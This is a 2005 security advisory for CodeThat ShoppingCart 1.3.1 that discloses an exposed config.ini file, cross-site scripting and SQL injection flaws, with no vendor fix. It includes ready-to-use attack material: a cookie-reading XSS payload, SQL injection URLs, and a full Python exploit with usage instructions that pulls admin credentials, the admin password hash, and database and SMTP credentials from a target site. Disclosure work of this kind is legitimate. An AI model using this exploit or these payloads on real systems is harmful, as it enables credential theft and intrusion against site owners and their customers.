codethatFlaws.txt

`##########################################################  
CodeThat ShoppingCart Critical information disclosure   
XSS and SQL injection  
vendor Url: http://www.codethat.com/shoppingcart/  
advisore:http://lostmon.blogspot.com/2005/05/  
codethat-shoppingcart-critical.html  
vendor notifY: yes exploit available: yes  
Discovered By Lostmon And icaro exploit code by icaro  
############################################################  
  
CodeThat ShoppingCart contains a flaw that may lead to an  
unauthorized disclosure of SQL conection data.It is possible  
to gain access to plain text SQL configuration details, this  
could allow a user to create a specially crafted URL to access   
'config.ini' file, which may lead to a loss of confidentiality.  
This flaw reveals too the admin´s username and his password   
hash.(automated exploit available) and the credential for   
configuration of SMTP server.  
  
Contains a flaw too that allows a remote cross site scripting  
attack.This flaw exists because the application does not validate  
'id' variables upon submission to the catalog.php scripts.This   
could allow a user to create a specially crafted URL that would  
execute arbitrary code in a user's browser within the trust  
relationship between the browser and the server,leading to a loss   
of integrity.  
  
All flaws are found by Lostmon ([email protected])   
and icaro ([email protected])and exploit code is coded  
by icaro from http://www.badchecksum.tk   
  
##########  
versions:  
##########  
  
1.3.1  
  
###########  
Solution  
###########  
  
no solution at this time  
  
############  
Timeline  
############  
  
discovered: 6 may 2005  
vendor notify: 7 may 2005  
vendor response: 8 may 2005 (automated response form spamarrest)  
vendor fix:  
disclosure:9 may 2005  
  
##########  
examples:  
####################  
Cross site scripting  
####################  
  
http://[victim]/codethat/catalog.php?action=category_show  
&id=2"><script>alert(document.cookie)</script>  
  
###############  
SQL injections  
###############  
  
http://[victim]/shoppingcart/catalog.php?action=category_show  
&id=1%20or%20like%20%60a%%60   
  
nice SQL error/response ...  
  
umm them try to list all products:  
  
http://[victim]shoppingcart/demo/catalog.php?action=  
category_show&id=1%20or%201=1  
  
command execution sucesfully !!!!  
  
aparently, non critical SQL injection ,the data base only have  
tree tables and no passwords or other information are stored   
in the database.  
  
  
##############################  
Critical information disclosure  
Exploit code include.  
###############################  
  
A remote user can access directly to SQL user name, password  
host, and all details about SQL configuration.  
  
A remote user can access Directly to admin´s user name and password hash.  
  
  
http://[victim]/shoppingcart/config.ini  
  
##############################  
Critical information disclosure.  
###############################  
  
A remote user can access directly to SQL user name, password  
host, and all details about SQL configuration.  
  
A remote user can access Directly to admin´s user name and password hash.  
  
A remote user can obtain information about SMTP configuration.  
  
http://[victim]/shoppingcart/config.ini  
  
#############################################  
Proof of concept automated exploit in Python  
#############################################  
  
# Lostmon Dismarking tm && icaro Badchecksum tm  
# Extract information tool exploit  
# Coded by icaro, Discovered by lostmon && icaro  
import httplib  
import sys  
import string  
import socket  
import os  
def uso():  
print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'  
print 'Usage: python ' + sys.argv[0] + ' host  
/directory_of_shoping_cart/\n'  
print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'  
def leeini(direccionweb,directorioshoping):  
web=httplib.HTTP(direccionweb)  
web.putrequest('GET',directorioshoping+'config.ini')  
web.putheader('Host',direccionweb)  
web.putheader('Accept', 'text/html')  
web.putheader('Accept', 'text/plain')  
web.endheaders()  
errcode, errmsg, headers = web.getreply()  
fichero=web.getfile()  
datos=fichero.read()  
f=open('tmp.txt','w')  
f.write(datos)  
f.close  
f=open('tmp.txt','r')  
lineas=f.readlines()  
f.close  
n=0  
print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'  
while n<len(lineas):  
if (string.find(lineas[n],'admin_username'))==0:  
  
imprime=string.replace(lineas[n],'admin_username : string ','Login ')  
print imprime  
if (string.find(lineas[n],'admin_password'))==0:  
  
imprime=string.replace(lineas[n],'admin_password : string ','Passwd ')  
print imprime  
n=n+1  
n=0  
print 'EXTRACCION DE INFORMACION DE BASE DE DATOS\n'  
while n<len(lineas):  
if (string.find(lineas[n],'driver : string '))==0:  
imprime=string.replace(lineas[n],'driver :  
string ','Tipo')  
print imprime  
if (string.find(lineas[n],'server : string '))==0:  
imprime=string.replace(lineas[n],'server :  
string ','Servidor ')  
print imprime  
if (string.find(lineas[n],'user : string '))==0:  
imprime=string.replace(lineas[n],'user : string  
','Usuario ')  
print imprime  
if (string.find(lineas[n],'password : string '))==0:  
imprime=string.replace(lineas[n],'password :  
string ','Passwd ')  
print imprime  
if (string.find(lineas[n],'database : string '))==0:  
imprime=string.replace(lineas[n],'database :  
string ','Base de datos ')  
print imprime  
n=n+1  
n=0  
print 'EXTRACCION DE INFORMACION DEL SERVIDOR SMTP\n'  
while n<len(lineas):  
if (string.find(lineas[n],'checkout_email : string '))==0:  
  
imprime=string.replace(lineas[n],'checkout_email : string ','Email  
del admin ')  
print imprime  
if (string.find(lineas[n],'from_name : string '))==0:  
imprime=string.replace(lineas[n],'from_name :  
string ','Nombre')  
print imprime  
if (string.find(lineas[n],'smtp_host : string '))==0:  
imprime=string.replace(lineas[n],'smtp_host :  
string ','Host ')  
print imprime  
if (string.find(lineas[n],'smtp_username : string '))==0:  
imprime=string.replace(lineas[n],'smtp_username  
: string ','Usuario ')  
print imprime  
if (string.find(lineas[n],'smtp_password : string '))==0:  
imprime=string.replace(lineas[n],'smtp_password  
: string ','Passwd ')  
print imprime  
n=n+1  
  
if len(sys.argv)==3:  
leeini(sys.argv[1],sys.argv[2])  
os.remove('tmp.txt')  
else:  
uso()  
  
####################### end ##############  
  
thnx to estrella to be my ligth  
thnx to all http://www.osvdb.org Team  
thnx to all who day after day support me !!!  
thnx to icaro he is with me and investigate.  
  
--  
atentamente:  
  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente....  
`